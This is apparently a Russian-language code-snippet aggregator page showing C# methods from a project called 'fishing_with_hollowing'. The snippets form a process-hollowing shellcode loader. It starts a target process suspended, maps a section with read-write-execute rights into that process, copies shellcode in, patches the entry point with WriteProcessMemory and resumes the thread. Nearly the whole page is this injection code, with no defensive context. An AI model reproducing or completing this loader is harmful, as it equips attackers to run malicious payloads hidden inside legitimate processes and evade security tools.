C# (CSharp) fishing_with_hollowing Loader.PROCESS_INFORMATION примеры использования

Пример #1

        public Loader.PROCESS_INFORMATION StartProcess(string path)
        {
            Loader.STARTUPINFO         sTARTUPINFO = default(Loader.STARTUPINFO);
            Loader.PROCESS_INFORMATION result      = default(Loader.PROCESS_INFORMATION);
            uint dwCreateFlags = 4u;

            if (!Loader.CreateProcess((IntPtr)0, path, (IntPtr)0, (IntPtr)0, false, dwCreateFlags, (IntPtr)0, (IntPtr)0, ref sTARTUPINFO, out result))
            {
                throw new SystemException("[x] Failed to create process!");
            }
            return(result);
        }

Пример #2

 public void Load(string targetProcess, byte[] shellcode)
 {
     Loader.PROCESS_INFORMATION pROCESS_INFORMATION = this.StartProcess(targetProcess);
     this.FindEntry(pROCESS_INFORMATION.hProcess);
     if (!this.CreateSection((uint)shellcode.Length))
     {
         throw new SystemException("[x] Failed to create new section!");
     }
     this.SetLocalSection((uint)shellcode.Length);
     this.CopyShellcode(shellcode);
     this.MapAndStart(pROCESS_INFORMATION);
     Loader.CloseHandle(pROCESS_INFORMATION.hThread);
     Loader.CloseHandle(pROCESS_INFORMATION.hProcess);
 }

Пример #3

        public void MapAndStart(Loader.PROCESS_INFORMATION pInfo)
        {
            KeyValuePair <IntPtr, IntPtr> keyValuePair = this.MapSection(pInfo.hProcess, 64u, IntPtr.Zero);

            if (keyValuePair.Key == (IntPtr)0 || keyValuePair.Value == (IntPtr)0)
            {
                throw new SystemException("[x] Failed to map section into target process!");
            }
            this.remotemap_  = keyValuePair.Key;
            this.remotesize_ = keyValuePair.Value;
            KeyValuePair <int, IntPtr> keyValuePair2 = this.BuildEntryPatch(keyValuePair.Key);

            try
            {
                IntPtr nSize = (IntPtr)keyValuePair2.Key;
                IntPtr value = 0;
                if (!Loader.WriteProcessMemory(pInfo.hProcess, this.pEntry_, keyValuePair2.Value, nSize, out value) || value == IntPtr.Zero)
                {
                    throw new SystemException("[x] Failed to write patch to start location! " + Loader.GetLastError().ToString());
                }
            }
            finally
            {
                if (keyValuePair2.Value != IntPtr.Zero)
                {
                    Marshal.FreeHGlobal(keyValuePair2.Value);
                }
            }
            byte[] lpBuffer = new byte[4096];
            IntPtr intPtr   = 0;

            if (!Loader.ReadProcessMemory(pInfo.hProcess, this.pEntry_, lpBuffer, 1024, out intPtr))
            {
                throw new SystemException("Failed!");
            }
            if (Loader.ResumeThread(pInfo.hThread) == 4294967295u)
            {
                throw new SystemException("[x] Failed to restart thread!");
            }
        }

Пример #4

 private static extern bool CreateProcess(IntPtr lpApplicationName, string lpCommandLine, IntPtr lpProcAttribs, IntPtr lpThreadAttribs, bool bInheritHandles, uint dwCreateFlags, IntPtr lpEnvironment, IntPtr lpCurrentDir, [In] ref Loader.STARTUPINFO lpStartinfo, out Loader.PROCESS_INFORMATION lpProcInformation);